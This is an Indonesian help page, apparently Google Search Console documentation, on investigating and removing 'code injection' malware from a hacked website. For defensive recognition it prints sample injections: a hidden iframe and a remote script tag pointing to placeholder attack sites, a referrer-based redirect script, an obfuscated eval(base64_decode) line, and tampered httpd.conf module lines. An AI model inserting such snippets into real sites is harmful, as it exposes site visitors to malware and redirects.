Jenis infeksi perangkat lunak perusak: Injeksi kode

Apa yang dimaksud dengan laman yang ditandai dengan jenis infeksi perangkat lunak perusak "Injeksi kode" di Google Search Console?

Artinya laman di situs Anda telah dimodifikasi untuk menyertakan kode berbahaya, seperti iframe ke situs serangan perangkat lunak perusak.

Untuk informasi umum selengkapnya tentang perangkat lunak perusak, lihat Menaksir kerusakan (diretas dengan perangkat lunak perusak).

Bagaimana cara menyelidiki jenis perangkat lunak perusak "injeksi kode"?

Pertama, jangan menggunakan browser untuk melihat laman yang terinfeksi pada situs Anda. Karena perangkat lunak perusak sering menyebar dengan memanfaatkan kerentanan browser, membuka laman perangkat lunak perusak yang terinfeksi di browser dapat merusak komputer Anda.

Pertimbangkan untuk mengonfirmasi perilaku tersebut menggunakan cURL atau Wget untuk melakukan permintaan HTTP (misalnya, untuk mengambil laman). Alat yang tersedia secara gratis ini sangat berguna dalam mendiagnosis pengalihan, dan memiliki fleksibilitas untuk menyertakan informasi perujuk atau user-agent. Dengan menyajikan konten berbahaya hanya kepada pengguna dengan perujuk atau user-agent tertentu, peretas dapat menargetkan "orang nyata" lainnya dan lebih lihai dalam menghindari deteksi dari pemilik situs dan pemindai perangkat lunak perusak. (Situs Anda harus online agar dapat menggunakan alat ini.)

Misalnya:

$curl -v --referer <referer-field> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, seperti Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <your-url>
seperti
$curl -v --referer "http://www.google.com" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, seperti Gecko) 
  Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html

Selanjutnya, masuklah ke sistem file Anda. Selidiki semua sumber daya yang menulis ke URL yang terinfeksi "injeksi kode". Berikut adalah beberapa contoh injeksi kode berbahaya:

  • iframe ke situs penyerang
  • <iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
      style="display:none" width="0"></iframe>
  • JavaScript atau bahasa skrip lain yang memanggil dan menjalankan skrip dari situs penyerang:
  • <script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
  • Skrip yang mengalihkan browser ke situs penyerang
  • <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://malware-attack-site/");
      }
    </script>
  • Kode berbahaya yang dikaburkan untuk menghindari deteksi
  • eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • File objek bersama yang dirancang untuk menulis kode berbahaya secara acak ke skrip yang tidak berbahaya
  • #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Selidiki semua kemungkinan kode berbahaya di situs. Menelusuri kata seperti [iframe] mungkin dapat membantu dalam menemukan kode iframe. Kata kunci lain yang bermanfaat adalah "skrip", "eval", dan "unescape". Contohnya, pada sistem berbasis Unix:

$grep -irn "iframe" ./ | less

Bagaimana cara membersihkan situs saya dari jenis perangkat lunak perusak "injeksi kode"?

Ketika Anda siap untuk membersihkan situs (Langkah 7 dari Bantuan proses pemulihan Situs yang Diretas), ganti file yang terpengaruh dengan cadangan terbaik paling baru atau hapus injeksi kode dari setiap laman serta semua file dan fungsi skrip yang terkait. Jika Anda memodifikasi file konfigurasi server, mulai ulang server web Anda agar perubahan tersebut efektif.

Perlu diketahui bahwa menghapus kode berbahaya tidak mengatasi akar penyebab kerentanan yang memungkinkan peretas menyusupi situs Anda lebih dulu. Tanpa memperbaiki akar penyebab masalahnya, situs Anda dapat disusupi lagi di masa mendatang. Untuk informasi selengkapnya tentang pembersihan seluruh situs (bukan hanya jenis perangkat lunak perusak ini), lihat Bantuan untuk Situs yang Diretas, terutama bagian "Penaksiran kerusakan sistem file" di Langkah 5: Menaksir kerusakan (diretas dengan perangkat lunak perusak).

Apakah ini membantu?
Bagaimana cara meningkatkannya?